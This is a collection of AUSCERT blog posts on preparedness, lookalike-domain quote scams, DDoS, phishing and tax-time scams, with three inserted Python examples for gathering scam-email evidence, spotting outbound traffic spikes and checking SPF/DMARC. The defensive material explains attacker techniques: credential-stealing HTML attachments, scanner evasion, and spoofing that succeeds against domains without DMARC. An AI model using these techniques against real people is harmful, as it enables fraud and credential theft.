Blogs

AUSCERT: A Proud History and a Bright Future

AUSCERT is a world-renowned organisation that has been providing cybersecurity services and expertise to small and large businesses, universities and government agencies in Australia and neighbouring countries for almost three decades. Since its establishment in 1993, AUSCERT has built a reputation as a trusted advisor and a provider of critical incident response and security analysis services. In March this year, AUSCERT sheds its “young adulthood” status and celebrates its thirtieth birthday!

AUSCERT’s history is rooted in its mission to protect the digital assets of its members by providing practical and expert cybersecurity advice and support. Over the years, AUSCERT has responded to thousands of cyber incidents and worked tirelessly to develop and promote cybersecurity awareness, education and best practices, both locally and internationally. Most importantly, AUSCERT is a not-for-profit organisation which exists only for its members, providing unique cybersecurity services which complement government and commercially available offerings. Based at The University of Queensland, AUSCERT works closely with UQ Cyber and with global networks such as APCERT and FIRST, having built excellent relationships worldwide over nearly thirty years. AUSCERT funds its cybersecurity services from not-for-profit membership fees, reinvesting a small surplus into the development of its team members, with an emphasis on continuous learning and improvement in culture.

Generous sponsors have allowed AUSCERT to host the longest-running cybersecurity conference in Australia every year since 2002. The conference is known for its great atmosphere and opportunities to collaborate with peers from all industries, and its presentations and tutorials are sourced from the very best practitioners locally and worldwide. Members receive free or discounted attendance to excellent, low-cost professional learning and development in a welcoming environment. Registrations for the 2023 event open soon!
In recent years, AUSCERT has expanded its services to include a range of cybersecurity training courses. With the growing demand for cybersecurity expertise, the AUSCERT Education program has become increasingly important, providing individuals and organisations with the skills and knowledge they need to stay ahead of the rapidly evolving cyber threat landscape. The AUSCERT Education program ranges from an introductory course for IT professionals who wish to learn the current terminology, practices and controls in cybersecurity to more advanced training such as cybersecurity risk management and forming an incident response plan. In recognition of the critical importance of areas such as board and executive cybersecurity awareness and data governance practices, during 2023 AUSCERT will expand its education programs into these areas. Together with this new direction in the AUSCERT Education program, other future services will include briefings for board members and executives, and implementation assistance for data governance practices. Overall, AUSCERT’s direction is to continue providing not-for-profit, high quality cybersecurity services and education for its members.


Cyber preparedness

The 2032 Olympic Games (to be held in AUSCERT’s home city of Brisbane) are less than 10 years away. That may seem a long way off, but consider this: the recent global pandemic caused significant suffering and loss on a personal level, while disrupting two, maybe three years of industrial progress worldwide with supply chain issues and the like. Natural disasters, of which Australia seems to have more than its fair share, also disrupt our lives personally and professionally.

We know preparedness is important for dealing with natural disasters and pandemics, but we still don’t always get it right. The well-established insurance and trade industries responsible for rebuilding houses are an example of this: I know of many families affected by Brisbane’s February 2022 floods who are still living in alternative accommodation, waiting on rebuilding efforts to even begin.

My point is, with cybersecurity a relatively new industry, now is the time to lay solid foundations for the future and “get it right” from the start. We don’t want to be looking back in a hundred years’ time, in 2123, thinking “we’re still not getting it right”.

This may seem like a problem for senior management, but it’s our job as cyber security professionals to advise on these matters. Depending on the culture in your organisation this could be challenging, so why not reach out to other like-minded professionals in AUSCERT’s Member Slack to ask how they’ve been successful?

One suggestion is to talk about preparedness generally, rather than specifically about cyber. Help management understand that “cyber” isn’t just an “IT department thing” and speak about it as a normal business function. It’s just like completing your Business Activity Statement, running payroll, managing the lifecycle of your customers or any other function a business needs to perform to retain relevance and solvency.
Also, management should assume a cyber security incident WILL occur and keep that in mind when preparing. It’s possible risk assessments were calculated using “rare” or “unlikely” likelihood ratings to offset a “catastrophic” consequence; as a professional you’ll be able to provide information about current events in cyber to make these assessments as accurate as possible. If you want some assistance keeping up with cyber security news, subscribe to AUSCERT’s ADIR for a daily digest.

In your briefings with management, talk about that crisis in the back of your mind, the one that occasionally wakes you up in a sweat because you know it would significantly impact lives (human or animal), livelihoods or the viability of your business. These days it’s usually ransomware, and because the actual risk is to the entire business we need to focus far wider than just the technical means by which ransomware is perpetrated, whether the operator is LockBit, Royal or another group.

In recent examples of both, the British Royal Mail was hit by LockBit and QUT suffered a breach by Royal over the Christmas period. In both cases the business impact was significant and ongoing: courses and exams at QUT were suspended, and Royal Mail advised customers not to attempt to send letters and parcels overseas until the issue was resolved. Even more serious was the subsequent news that the Royal gang allegedly released the data stolen from QUT.

Whatever the crisis, you’ll need clarity on roles, responsibilities and escalation protocols. This is far bigger than the IT department or the cyber security team. Your business will need to plan how internal and public communications are handled, have a war room, and manage handovers to prevent fatigue. If you don’t have a good plan already, why not lead a charge in your organisation to create one? Here’s a great template from the ACSC.
There are more considerations you may be called to advise upon which are not traditionally “the IT department’s problems”. You might need to help your organisation define a risk appetite. If we’re talking about ransoms, would your organisation pay a ransom? What legal and/or regulatory considerations are there? You might be in a situation in which lives depend upon payment of a ransom, and there have been rumours that cyber insurers may insist that you do pay the ransom to claim overall damages.

One of the best ways to draw out answers to these sorts of questions is to undertake a tabletop exercise. In these events you bring together key decision makers from all parts of your business and simulate an actual crisis. There are plenty of consultants who’ll provide this as a paid service, and if you don’t know of any, reach out in AUSCERT’s Member Slack to ask your peers who they’d recommend. The ACSC’s Critical Infrastructure Uplift Program also provides tabletop exercises to certain industries, along with unique insights into national cyber security incidents they’ve responded to. At the very least you could run your own scenario using the ACSC’s Exercise in a Box, although sometimes bringing in outside advisors (particularly the Federal Government) does give your cyber preparedness plan extra credibility.

To help you with all of these concerns in 2023, we’ll continue providing our incident support and cyber threat intel for our members, and we’ll add training and awareness programs that aim to help with cyber preparedness. We know that all of you are extremely busy with day-to-day activities, ever-increasing regulatory requirements and fighting cyber incidents. The new training courses will help you learn the very latest techniques in areas such as data governance, practical applications of cyber threat intelligence, and awareness of cybersecurity at the executive and board level.
Hopefully you’ll all enjoy a prosperous, safe, happy and cyber-prepared 2023!

Mike Holm
AUSCERT Senior Manager


Spoofed domains being used for Request For Quote (RFQ) scams

RECENT TARGETS

AUSCERT has been receiving reports of various RFQ scams spoofing Australian universities and targeting vendors via the spoofed domain.

THE TRIED AND TESTED METHOD

A scammer registers a domain that looks identical to a university’s (a lookalike or “spoofed” domain). The spoofed domain is given active MX records and is then used to send emails to various vendors asking for quotes for the products they sell. Because the MX records point to mail servers the scammer controls, vendors’ replies are delivered straight back to the scammer. The email address usually impersonates a staff member at the executive level. In some cases the emails may be blocked or quarantined, depending on the vendor’s security policy; hence, small and medium-sized companies are targeted, as they may have a lower level of maturity in their security policies. Note that email authentication does not catch this on its own: if the scammer publishes SPF or DKIM records for the lookalike domain they will pass, because the domain genuinely belongs to the scammer. What is fraudulent is the domain name itself.

When such reports are sent to AUSCERT, they can be acted upon quickly if we are provided with the email headers as evidence; with those details the domain registrar will usually suspend the domain.

HOW IT HAS CHANGED

Some scammers have now changed how they deliver these RFQ scams. To avoid having their emails quarantined, and to avoid being taken down by the registrar (which usually requires email headers in such cases), scammers now use the built-in web forms on the websites of small and medium-sized companies. The email address submitted in the form belongs to the spoofed domain. In such cases it is difficult for the targeted university to reach out to the companies asking for more information. Furthermore, since no email headers are recorded, submitting a takedown request to the domain registrar is difficult without much evidence.

WHAT THE UNIVERSITY CAN DO

Submit as much information as possible. It is also recommended that the university reach out to the company that communicated with the scammer to obtain any related information, e.g. the web form submission or chat transcript in this case. If the university is unable to contact the vendor, AUSCERT might be able to assist.
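Collecting the header evidence a registrar asks for, and checking whether the sender’s domain is a lookalike of the university’s real one, can be scripted on either the vendor’s or the university’s side. The following is an added example, not AUSCERT’s tooling: the message, the lookalike domain example-uni-edu.com, the university domain example-uni.edu.au, the vendor host and the IP address 203.0.113.45 are all constructed for the example.

```python
"""Pull takedown evidence out of a suspected RFQ-scam email and flag a
lookalike sender domain.  Added example, not AUSCERT's own tooling.
The message, the domains and the IP address are constructed for the
example; example-uni.edu.au stands in for the real university domain."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from difflib import SequenceMatcher

# Constructed sample message as a vendor's mail server might store it.
RAW_MESSAGE = """\
Return-Path: <procurement@example-uni-edu.com>
Received: from mail.example-uni-edu.com (mail.example-uni-edu.com [203.0.113.45])
    by mx1.vendor.example (Postfix) with ESMTPS id 4ABCD
    for <sales@vendor.example>; Mon, 6 Mar 2023 09:14:02 +1000 (AEST)
Authentication-Results: mx1.vendor.example; spf=pass smtp.mailfrom=example-uni-edu.com
From: "Chief Operating Officer" <procurement@example-uni-edu.com>
Reply-To: procurement@example-uni-edu.com
To: sales@vendor.example
Subject: Request for Quote - urgent
Message-ID: <20230306091400.1@mail.example-uni-edu.com>
Date: Mon, 6 Mar 2023 09:14:00 +1000

Please quote for 40 laptops for delivery to our campus.
"""

LEGIT_DOMAINS = {"example-uni.edu.au"}   # assumed: the university's real domains

def domain_of(header_value):
    """Lower-cased domain part of a header such as 'Name <user@domain>'."""
    _, address = parseaddr(str(header_value or ""))
    return address.rpartition("@")[2].lower()

def normalise(domain):
    """Drop dots and hyphens so 'uni-edu.com' and 'uni.edu.au' compare on letters."""
    return re.sub(r"[.-]", "", domain.lower())

def lookalike_score(candidate, legit):
    return SequenceMatcher(None, normalise(candidate), normalise(legit)).ratio()

def is_lookalike(candidate, legit_domains=LEGIT_DOMAINS, threshold=0.8):
    """True when candidate is not one of ours but closely resembles one of ours."""
    if candidate in legit_domains:
        return False
    return any(lookalike_score(candidate, d) >= threshold for d in legit_domains)

def extract_evidence(raw):
    """Headers a registrar abuse desk will ask for, plus the lookalike verdict."""
    msg = message_from_string(raw, policy=policy.default)
    received = msg.get_all("Received") or []
    # Each MTA prepends its own Received line, so the last one is the
    # earliest hop: the host that actually injected the message.
    first_hop = str(received[-1]) if received else ""
    ip = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", first_hop)
    evidence = {
        "from_domain": domain_of(msg["From"]),
        "return_path_domain": domain_of(msg["Return-Path"]),
        "reply_to_domain": domain_of(msg["Reply-To"]),
        "sending_ip": ip.group(1) if ip else None,
        "message_id": str(msg["Message-ID"] or ""),
        "date": str(msg["Date"] or ""),
        "authentication_results": str(msg["Authentication-Results"] or ""),
    }
    evidence["lookalike"] = is_lookalike(evidence["from_domain"])
    return evidence

if __name__ == "__main__":
    for key, value in extract_evidence(RAW_MESSAGE).items():
        print(f"{key:24} {value}")
```

Feed it the raw .eml as the vendor received it, not a forwarded copy, since forwarding replaces the Received chain and the Return-Path. The spf=pass in Authentication-Results is expected and is not a sign of legitimacy here: the scammer controls the lookalike domain and its DNS. A live `dig MX example-uni-edu.com` will show the active MX records the takedown request should mention.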


Women in Cyber Security Awards 2022

AUSCERT was delighted to sponsor the Best Security Student Award at the recent Women in Security Awards held in Sydney. Five outstanding finalists were in the running, each achieving success in their respective pursuits, with Elena Scifleet from CyberCX declared the winner! Congratulations to all the winners and everyone who contributed to such a successful and enjoyable event; we can’t wait for 2023! To see who else was recognised, visit the Women in Security Awards 2022 winners page.

Members of the AUSCERT team were in attendance for the occasion, with Analyst Vishaka providing a summary of her experience below:

It was a privilege to have been able to attend the Australian Women in Cyber Security Gala night 2022 along with my colleagues, on the evening of Wednesday, October 12. The event kicked off with a cocktail networking hour. It was exciting to see so many familiar faces and meet new ones who are either pursuing their higher education in Cyber Security or just stepping into a career in Cyber Security.

This year’s celebrations saw a staggering 826 nominations, with 81 finalists, 19 winners, 17 Highly Commended and 2 Special Recognition recipients across 18 different award categories, including Best Female Secure Coder, Protective Security Champion, IT Security Champion and Australia’s Most Outstanding Woman in IT Security. Kudos to AUSCERT’s former employee Laura Jiew for taking the Best Volunteer award home! I felt absolutely honoured to witness the talented women who received awards for their accomplishments, value and contributions to Cyber Security; most of them had a truly inspirational and motivational story to share!

While celebrating women in Cyber Security, the event also acknowledged male counterparts in the field who have contributed to eliminating gender-based discrimination and bias in the workplace and promoting equality in the IT security industry. Dushyant Sattiraju and Dave O’Loan were recognised as Highly Commended in the Male Champion of Change category, while Clive Rees bagged the award. Throughout the event, the importance of, and need for, being a mentor to other women in the field was highlighted. Thank you to Abigail Swabey and her team for pulling off such a successful and fabulous event, and thank you to the AUSCERT management for giving me the opportunity to participate in the event.


My Time on the BSide

BSides Melbourne is a not-for-profit event that is wholly run by volunteers for the benefit of the community. It’s a community-driven conference that encourages and welcomes first-time speakers and students along with industry professionals, experienced and new alike! AUSCERT was delighted to sponsor the event, providing the tote bags for all attendees to fill with the array of goodies on offer. Some of the AUSCERT team ventured south to participate in the long-awaited (thanks to COVID delays) BSides Melbourne 2022. The following is an account of events from one of our Analysts, Vishaka.

Day 1

The conference started with Joff Thyer’s keynote presentation, which told of his inspirational journey in Information Security. He highlighted the key skills and qualities for a successful 21st-century career, with my main takeaways from his speech being: if you make a mistake, do not walk away from it but take ownership of it and learn from it; and learn a programming language (he specifically mentioned Python).

Afterwards, Mike Pritchard and Shanna Daly showcased how the craft of traditional espionage maps to the modern cyber world. Mike, who is a passionate collector of historical espionage artefacts, presented his extensive collection of spy gadgets; I found this to be super cool!

I then made my way to a presentation about the data leak published on Twitter about the Conti ransomware gang, which operates Ransomware as a Service (RaaS). The presentation by Thomas Roccia, a Senior Security Researcher at Microsoft, highlighted how the leaked chat logs revealed private discussions between Conti members and how the data provided a unique insight into the inner workings of the group.

I next ventured to “Data, Demogorgons and the Upside-down world… and a Battleforce Angel” by Tara Dharnikota, which discussed data breaches and data thefts, specifically how stolen data gets sold and distributed on darknet forums and marketplaces. Tara also emphasised the power of OSINT and how it can be used for good.

One of my favourites of the day was the talk by Jo, “How to (almost) get a DEFCON black badge”. She is the runner-up of the DefCon Social Engineering CTF (SECTF) competition and shared her experience at the 2019 SECTF in the battle for the DefCon Black Badge.

The last speaker of the day was Emerald Sage, who spoke about APT catfishing and demonstrated how Open Source Intelligence tools and techniques can reconstruct the APT actor playbook for engineering and executing catfishing-facilitated attacks.

Day 2

Laura Bell kicked off the second day with a talk that demonstrated how proximity affects human behaviour, and how we as a cyber security community can embrace this knowledge to secure an entire country. My quest for knowledge and insight delivered me to “The Socio-Economic Impact of Women in Tech” by Kathy Robins. In this fascinating talk, she discussed the lack of female participation in the technical fields within the cyber security sector and STEM, and how it creates a ripple effect throughout the development of technologies, systems and services.


APCERT CYBER DRILL 2022

The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a collaborative undertaking that maintains and improves awareness and skills within the cyber security community. The theme for 2022 was “Data Breach through Security Malpractice”, which focused on realistic, real-world cyber security risks and the incidents that could result from them.

AUSCERT Analyst Narayan Neupane said, “This year’s drill was about tracing a ransomware activity and tracing the uploaded file’s location via provided evidence. The drill focused on packet capture, email analysis, forensic investigation, and incident response.” He continued, “Whilst some activities performed in the drill are carried out more than others in our daily work, it’s important and worthwhile to be tested in unexpected ways – it reflects what happens in the real world!”

The experiences and tasks conducted by each participating team allow for knowledge sharing, as no single CERT typically experiences the same issues or provides like-for-like services. The APCERT drill aims to maintain and progress internet security and safety, with the exercise providing participants with the chance to improve communication protocols, technical responses and the overall quality of incident response. “This year’s drill was tough but also fun, and there was a feeling of satisfaction once we were able to finish the drill successfully”, Narayan concluded.

This year, 25 CSIRTs from 21 economies took part in the drill and, although it was undertaken in a few hours, the lessons learned from the experience can provide benefits long after. As each drill typically requires six to eight months of planning and preparation, work on the 2023 APCERT Cyber Drill will soon be underway; the ongoing need for education and skill enhancement reflects the rapid development of the digital world we reside in and the threats we all face.


What is DDoS & How Does it Work?

What is distributed denial of service (DDoS) & How Does it Work?

The AUSCERT team provides proactive and reactive incident response assistance, actively seeking information from various sources to help find data relevant to a client. We take immediate action and follow well-defined protocols in order to obtain a resolution and a satisfactory outcome. This article is aimed at those who need a high-level explanation of what a DDoS attack is.

DDoS Attacks In 2022

Already in 2022 the IT industry has experienced a large increase in distributed denial of service (DDoS) attacks. Not that long ago, most DDoS attacks were seen as minor nuisances perpetrated by novices who did it for fun, and back then DDoS attacks were relatively easy to mitigate. DDoS attacks have become an extremely sophisticated activity and, in many cases, big business. According to TechRepublic, in the first quarter of 2022 Kaspersky DDoS Intelligence systems detected 91,052 DDoS attacks; 44.34% of attacks were directed at targets located in the USA, which comprised 45.02% of all targets.

Exactly What Is a DDoS Attack?

DDoS attacks are becoming ever more common, and they can be quite sophisticated and difficult to combat. But what exactly is a DDoS attack and what does DDoS stand for? DDoS is the acronym for Distributed Denial of Service. A DDoS attack occurs when a threat actor uses resources from multiple remote locations (typically a botnet of compromised machines, or third-party servers abused to reflect and amplify traffic) to attack an organisation’s online operations. The goal is to consume resources so that legitimate access to services is not possible; for example, a website or online service will appear to be ‘down’ for people attempting to use it. DDoS attacks usually focus on generating a huge amount of network traffic that overwhelms network equipment and services such as routers, domain name servers or web caches, although application-layer attacks that exhaust a server with a comparatively small number of expensive requests are also common.

How Long Can DDoS Attacks Last For?

The short answer: there is no set duration. DDoS attacks vary extensively in both duration and sophistication.

Long-Term Attack: An attack waged over a period of hours or days is referred to as a long-term attack. For example, one of the largest recorded DDoS attacks, against Amazon Web Services (AWS), caused disruption for three days before finally being mitigated.

Burst Attack: Also known as pulse-wave attacks; as the name implies, they are waged over a very short period of time, lasting from a few seconds to a few minutes and occurring in frequent bursts. Again, duration is not really the measure of severity: short burst attacks can be as damaging as long-term attacks.

How to Protect Your Organisation Against DDoS Attacks

Some measures that organisations can take to protect themselves against DDoS attacks are:

Reduce the attack surface of Internet-visible services to only that which is required. For example, drop inbound traffic to ports and protocols you do not serve. If you filter ICMP, block echo requests and other types you do not need, but keep the types that path MTU discovery relies on (ICMP “fragmentation needed” and ICMPv6 “packet too big”); blocking all ICMP breaks connectivity for some legitimate clients.

Use a Content Delivery Network (CDN) or a cloud DDoS scrubbing service, so that attack traffic is absorbed before it reaches your origin servers.

Implement server-level DDoS mitigation measures, making use of best practice guides from application and operating system software providers.

Plan for disruption, including alternative ways of providing services to clients. Short-term increases in network or server capacity may be a solution, depending on the costs. Knowing these options in advance will inform business continuity planning discussions.

Implement monitoring to detect large increases in outbound network traffic, to avoid becoming part of the problem and the cause of reputational damage.

Phishing Take-down Service

AUSCERT’s Phishing Take-down service works to reduce brand damage by requesting the removal of fraudulent websites. The service puts the safety of your brand at the forefront by detecting and acting immediately if your organisation is affected. Details of this service are available from AUSCERT.
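The last measure above, watching outbound traffic for a sudden jump, is a small detection problem in its own right. The script below is an added example, not an AUSCERT tool: it runs a robust spike detector (median and median absolute deviation, so a single burst does not drag the baseline up) over constructed per-minute outbound byte counts for one uplink. The window length and threshold are assumed tuning values, and the traffic figures are not real telemetry.

```python
"""Flag sudden rises in outbound traffic from per-minute byte counters, the
check that tells you your own hosts have joined a flood.  Added example,
not an AUSCERT tool; the counter values are constructed, not real telemetry."""
from statistics import median

# Constructed per-minute outbound byte counts for one uplink: quiet
# traffic around 5 MB/min, then three minutes at roughly 800 MB/min.
SAMPLES = [
    ("09:00", 5_100_000), ("09:01", 4_900_000), ("09:02", 5_300_000),
    ("09:03", 5_000_000), ("09:04", 4_800_000), ("09:05", 5_200_000),
    ("09:06", 5_050_000), ("09:07", 4_950_000), ("09:08", 5_150_000),
    ("09:09", 4_850_000), ("09:10", 5_250_000), ("09:11", 5_000_000),
    ("09:12", 5_100_000), ("09:13", 4_950_000),
    ("09:14", 800_000_000), ("09:15", 760_000_000), ("09:16", 810_000_000),
    ("09:17", 5_000_000), ("09:18", 5_100_000),
]

def robust_baseline(values):
    """Median and a MAD-based scale; a single outlier barely moves either."""
    m = median(values)
    mad = median(abs(v - m) for v in values)
    scale = 1.4826 * mad            # MAD scaled to a standard-deviation equivalent
    if scale == 0:                  # flat history: fall back to 5% of the median
        scale = max(m * 0.05, 1.0)
    return m, scale

def detect_spikes(samples, window=12, threshold=6.0):
    """Return (timestamp, bytes, score) for every interval whose count is
    more than `threshold` robust standard deviations above the baseline
    formed by the previous `window` clean intervals."""
    alerts, clean = [], []
    for ts, count in samples:
        if len(clean) >= window:
            m, scale = robust_baseline(clean[-window:])
            score = (count - m) / scale
            if score > threshold:
                alerts.append((ts, count, round(score, 1)))
                continue            # keep the anomaly out of the baseline
        clean.append(count)
    return alerts

if __name__ == "__main__":
    for ts, count, score in detect_spikes(SAMPLES):
        print(f"{ts}: {count:>12,} bytes out (score {score})")
```

Excluding flagged intervals from the history is deliberate: if the flood is sustained, a naive sliding window would absorb it within a few minutes and stop alerting. In production the same logic would run per host or per egress interface on flow records, and would also watch packet rate and unusual destination ports, since reflection traffic from amplifiers looks like a large number of small packets rather than a byte-volume jump.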


What is Phishing?

What is Phishing?

Phishing is an attack in which the attacker impersonates a reputable entity or person in email or other forms of communication, such as SMS or instant messaging. Most commonly, attackers use phishing emails to distribute malicious links or attachments that can perform a variety of malicious functions.

Phishing Attacks

A phishing attack can have devastating results. For individuals, this includes unauthorised purchases, electronic theft of money, or identity theft. Phishing attacks are often used to gain a foothold in an organisation’s network as part of a larger attack, such as ransomware or Business Email Compromise. This happens when employees are compromised in order to bypass security controls and distribute malware or fraudulent messaging inside the victim organisation. A successful attack on an organisation can have severe implications such as financial losses and extended outages, in addition to a reduction in market share, damaged reputation, and loss of customer trust.

Types Of Phishing Attacks

Email Phishing Scams

In the most common version of email-based phishing, the attacker sends out thousands of fraudulent messages with the intent of gathering personal information or account credentials, or for direct financial gain. This type of attack is very much a numbers game: even if only 1% of several thousand recipients fall for the scam, the attack can be considered successful. As with legitimate marketing campaigns, fraudsters will take the time and effort to maximise their return by trialling different messaging and tactics and studying their relative success rates. They clone emails from the spoofed organisation, using the same phrasing, typefaces, logos and signatures to make the messages appear legitimate. Additionally, attackers commonly try to push users into action by creating a sense of urgency; for example, an email could threaten account expiration and place the recipient on a deadline. By applying a time-sensitive cue, users are more likely to act sooner rather than later, without much thought.

These scams can be hard to spot, typically relying on a misspelt website address or an extra subdomain; for example www.commbank.com.au/login could become www.combank.com.au/login, which despite the single missing letter is an entirely different registered domain. The similarity between the two addresses gives the impression of a legitimate link, making it more difficult to notice that an attack is taking place.

Spear Phishing

Spear phishing is a more precisely focused attack that targets a specific person or organisation, as opposed to thousands of people as described above. It often incorporates specific knowledge about an organisation, such as its staff members’ names and titles, its organisational structure and its clients. A common spear phishing scenario is one in which the attackers research the names of employees within an organisation’s marketing department in order to gain access to the latest project invoices. Posing as a marketing director, the attacker emails a departmental project manager (PM) with a subject line that reads something like “Updated invoice for Q3 campaigns”. The email is a clone of the organisation’s standard email template. A link in the email leads to what appears to be a password-protected internal document, which is simply a spoofed login page in front of a stolen invoice. The PM is asked to log in to view the document. The attacker captures the login credentials, gaining access to sensitive areas of the organisation’s network. By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of further attacks, such as ransomware or Business Email Compromise.

How To Prevent Phishing

To protect against phishing attacks, steps should be taken by both employees and enterprises. For employees, simple vigilance is vital. A spoofed message will almost always contain subtle differences that expose its fraudulent purpose; these frequently include spelling errors, such as in website names. Users should also stop and think about why they are even receiving the email and whether it seems unusual or out of character for the alleged sender.

At an enterprise level, a number of steps can be taken to mitigate both phishing and spear phishing attacks:

Two-factor authentication (2FA) is one of the most effective controls against phishing, as it adds an extra verification layer when logging in to applications. 2FA relies on users having two things: something they know, such as a username and password, and something they have, such as a mobile phone running an authentication app. Be aware that SMS codes and app-generated one-time codes can still be relayed in real time by a phishing site that sits between the user and the genuine login page; phishing-resistant methods such as FIDO2 security keys and passkeys, which bind the login to the genuine site’s origin, close that gap.

Organisations should enforce a password management policy that takes into account how people actually behave. For example, staff should be required to use passwords that are difficult for an attacker to guess but not so complex that they can’t be remembered. Passphrases are often a better strategy than complex passwords. Password managers combine convenience and strong passwords, and their use should be encouraged. Staff should be educated not to reuse the same password for multiple accounts, as this makes credential stuffing (replaying a password leaked from one service against others) and password spraying attacks much easier.

Empowering employees through engaging and informative cyber security awareness training will help reduce the threat of most cyber security attacks, including phishing.

Publish SPF and DKIM records and enforce them with a DMARC policy (p=quarantine or p=reject) to make it more difficult for attackers to send email faking your organisation’s domain. Note that these controls protect your own domain from being spoofed; they do nothing against a lookalike domain the attacker registers, which is why the sender and link checks above still matter.

Early Warning SMS

Early warning notifications assist in managing critical security threats to your network. AUSCERT monitors malicious activity online and the Early Warning Service provides SMS notifications of any immediate and serious threats relevant to your industry. Details of this service are available from AUSCERT.
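The SPF and DMARC point is worth seeing in code, because SPF on its own only vouches for the envelope sender (MAIL FROM), not for the From: address the user sees; it is DMARC’s alignment rule that ties the two together. The following is an added example, not AUSCERT’s code: a simplified receiver-side evaluator with constructed DNS TXT records for the assumed domains example.com.au, attacker.example and nodmarc.example, served from an in-memory table instead of live DNS. DKIM is left out (it needs the signed message), only the ip4/ip6/include/all SPF mechanisms are implemented, and relaxed alignment is approximated without the public suffix list.

```python
"""Evaluate SPF and DMARC for an inbound message the way a receiving mail
server does, to show what SPF on its own does and does not stop.  Added
example, not AUSCERT's code.  DNS TXT records are constructed and served
from an in-memory table rather than live DNS; the domains and addresses
are assumed.  DKIM is not evaluated here (it needs the signed message)."""
import ipaddress

DNS_TXT = {
    "example.com.au": "v=spf1 ip4:198.51.100.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:192.0.2.10 ~all",
    "_dmarc.example.com.au": "v=DMARC1; p=reject; rua=mailto:dmarc@example.com.au",
    "attacker.example": "v=spf1 ip4:203.0.113.0/24 -all",
    # nodmarc.example publishes no records at all
}

RESULT_FOR_QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def spf_check(ip, domain, depth=0):
    """SPF result for `ip` sending with MAIL FROM at `domain`.  Handles the
    ip4/ip6/include/all mechanisms; a/mx/exists would need live DNS."""
    record = DNS_TXT.get(domain, "")
    if not record.startswith("v=spf1") or depth > 10:
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier, mech = "+", term
        if term[0] in RESULT_FOR_QUALIFIER:
            qualifier, mech = term[0], term[1:]
        result = RESULT_FOR_QUALIFIER[qualifier]
        if mech == "all":
            return result
        if mech.startswith(("ip4:", "ip6:")):
            # an IPv6 address is simply never inside an ip4 network, and vice versa
            if addr in ipaddress.ip_network(mech[4:], strict=False):
                return result
        elif mech.startswith("include:"):
            if spf_check(ip, mech[len("include:"):], depth + 1) == "pass":
                return result
    return "neutral"      # no mechanism matched and no 'all' term

def parse_dmarc(record):
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = value.strip()
    return tags

def aligned(from_domain, auth_domain, mode):
    """DMARC identifier alignment.  Relaxed mode ('r') is approximated as
    'same domain or a subdomain'; a real implementation uses the public
    suffix list to find the organisational domain."""
    if from_domain == auth_domain:
        return True
    if mode == "s":
        return False
    return (from_domain.endswith("." + auth_domain)
            or auth_domain.endswith("." + from_domain))

def evaluate(ip, mailfrom_domain, from_domain):
    """Disposition for a message: the SPF result counts towards DMARC only
    when the MAIL FROM domain aligns with the visible From: domain."""
    spf = spf_check(ip, mailfrom_domain)
    record = DNS_TXT.get("_dmarc." + from_domain)
    if record is None:
        return "accept (no DMARC record)"
    tags = parse_dmarc(record)
    if spf == "pass" and aligned(from_domain, mailfrom_domain, tags.get("aspf", "r")):
        return "accept"
    dmarc_policy = tags.get("p", "none")
    return "accept (DMARC p=none)" if dmarc_policy == "none" else dmarc_policy

if __name__ == "__main__":
    # Genuine mail from the organisation's own server
    print(evaluate("198.51.100.7", "example.com.au", "example.com.au"))
    # Attacker's own domain passes SPF, but From: is spoofed and unaligned
    print(evaluate("203.0.113.5", "attacker.example", "example.com.au"))
    # The same trick against a domain with no DMARC record sails through
    print(evaluate("203.0.113.5", "attacker.example", "nodmarc.example"))
```

The second and third cases are the ones to note. The attacker sends from their own, correctly configured domain, so SPF passes; only the DMARC record on example.com.au turns the unaligned From: into a rejection, and nodmarc.example, which publishes nothing, is accepted with the spoofed From: intact. This is also why a p=none policy is only a monitoring step: it reports the failure but still delivers the message.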


Staying aware this tax time

As one financial year ends and another begins, Australians start preparing their tax returns and with it, an increase in the frequency and scope of tax-related phishing is expected. We are going to look at various methods a scammer/attacker might use to obtain your personal information, such as username, password, credit card details, contact details or any other information that identifies you as you. This personal information is then used fraudulently or to conduct further malicious activities, depending on the data obtained.

Email phishing

Email phishing is one of the most common methods used to obtain your personal information. The sender imitates the Australian Taxation Office (ATO) or myGov and sends a phishing email that looks like a legitimate email. The spoofed sender address may be difficult to detect when the recipient is using a phone, as mail apps on phones typically show only the display name and not the actual email address in full.

a. Email with a phishing URL

Usually, such emails contain a phishing link that, when clicked, redirects the user to a website asking for personal information. Emails that request the recipient to enter their details, such as bank account information, could lead to fraud.

[Figure: example of malicious email with a phishing URL]

b. Email with a local HTML attachment

Some emails will not contain any phishing URLs within the body of the email. Instead, the email will have an HTML file as an attachment. When a user opens the HTML attachment, it renders a phishing form requesting the user to enter a username and password. The HTML file contains code that sends the credentials to the attacker (if entered). Such techniques are used to avoid email security software that scans links in the message body but does not inspect attachments.

[Figure: example of malicious email with an HTML attachment]
[Figure: example of malicious email with an HTML phishing form]

Smishing (SMS phishing)

As consumers become more aware of potential threats and scams, attackers develop new methods to target and trick recipients. One such method is smishing. The method is quite simple: fake texts are disguised to come from a known and trusted source such as a bank or the ATO. In this instance, a text message with a URL is sent to a phone number, pretending to be from myGov. When clicked, the user is redirected to a myGov phishing page where they are required to enter personal information. Additionally, it can then redirect the user to a secondary phishing page made to look like a bank.

[Figure: example of malicious phishing link in SMS/text message (1)]
[Figure: example of malicious phishing link in SMS/text message (2)]
[Figure: example of phishing page (myGov)]
[Figure: example of phishing page redirecting to a secondary phishing page (myGov to a bank)]

It is important to know that the ATO and myGov will not send an email or text message asking you for personal information. Should you receive a suspicious email or SMS, please report it to ReportEmailFraud@ato.gov.au or contact the ATO. If something looks suspicious, be it the spelling, the website address or the request within the message, do not click the link or proceed!

The ATO is a member of AUSCERT and we help the ATO in deactivating such phishing websites. AUSCERT members have access to the Malicious URL Feed, which is automatically populated with malware and phishing links as AUSCERT’s Analyst Team processes them and is updated every 15 minutes. Additional indicators (over and above the malicious URLs), such as email content and phishing page screen captures, can be found in AUSCERT’s Member Security Incident Notifications (MISP). Further information on these services can be found at the links below:

AUSCERT Malicious URL Feed
AUSCERT MISP
